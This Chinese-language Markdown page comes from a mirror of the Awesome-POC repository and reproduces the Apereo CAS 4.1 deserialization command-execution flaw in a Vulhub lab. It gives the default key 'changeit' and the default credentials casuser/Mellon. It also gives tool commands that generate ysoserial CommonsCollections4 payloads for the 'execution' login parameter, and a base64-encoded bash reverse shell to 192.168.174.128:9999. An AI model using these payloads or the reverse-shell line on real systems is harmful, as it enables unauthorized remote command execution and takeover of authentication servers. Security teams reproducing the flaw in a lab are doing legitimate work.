admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 12:25:11 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/中间件漏洞/Apereo CAS 4.1 反序列化命令执行漏洞.md

80 lines
2.6 KiB
Markdown
Raw Normal View History

update
2024-11-06 14:10:36 +08:00
# Apereo CAS 4.1 反序列化命令执行漏洞
## 漏洞描述
Apereo CAS是一款Apereo发布的集中认证服务平台常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。
参考链接:
- https://apereo.github.io/2016/04/08/commonsvulndisc/
## 环境搭建
Vulhub执行如下命令启动一个Apereo CAS 4.1.5
```
docker-compose up -d
```
环境启动后,访问`http://your-ip:8080/cas/login`即可查看到登录页面。
## 漏洞复现
### 写入文件
漏洞原理实际上是Webflow中使用了默认密钥`changeit`
```
public class EncryptedTranscoder implements Transcoder {
private CipherBean cipherBean;
private boolean compression = true;
public EncryptedTranscoder() throws IOException {
BufferedBlockCipherBean bufferedBlockCipherBean = new BufferedBlockCipherBean();
bufferedBlockCipherBean.setBlockCipherSpec(new BufferedBlockCipherSpec("AES", "CBC", "PKCS7"));
bufferedBlockCipherBean.setKeyStore(this.createAndPrepareKeyStore());
bufferedBlockCipherBean.setKeyAlias("aes128");
bufferedBlockCipherBean.setKeyPassword("changeit");
bufferedBlockCipherBean.setNonce(new RBGNonce());
this.setCipherBean(bufferedBlockCipherBean);
}
// ...
```
使用[Apereo-CAS-Attack](https://github.com/vulhub/Apereo-CAS-Attack)来复现这个漏洞。使用ysoserial的CommonsCollections4生成加密后的Payload
```
java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /tmp/awesome_poc"
```
![image-20220223143747931](images/202202231437193.png)
然后登录Apereo CAS并抓包默认用户名/密码为casuser/Mellon将Body中的`execution`值替换成上面生成的Payload发送
![image-20220221163417155](images/202202211634315.png)
登录Apereo CAStouch /tmp/success已成功执行
![image-20220221163608606](images/202202211636651.png)
### 写入反弹shell
构造反弹shell并进行base64编码
```
bash -i >& /dev/tcp/192.168.174.128/9999 0>&1 (base64编码)
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NC4xMjgvOTk5OSAwPiYx
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NC4xMjgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}
java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NC4xMjgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}"
```
![image-20220223143714661](images/202202231437964.png)
监听端口成功反弹shell
![image-20220221164026966](images/202202211640018.png)
Reference in New Issue Copy Permalink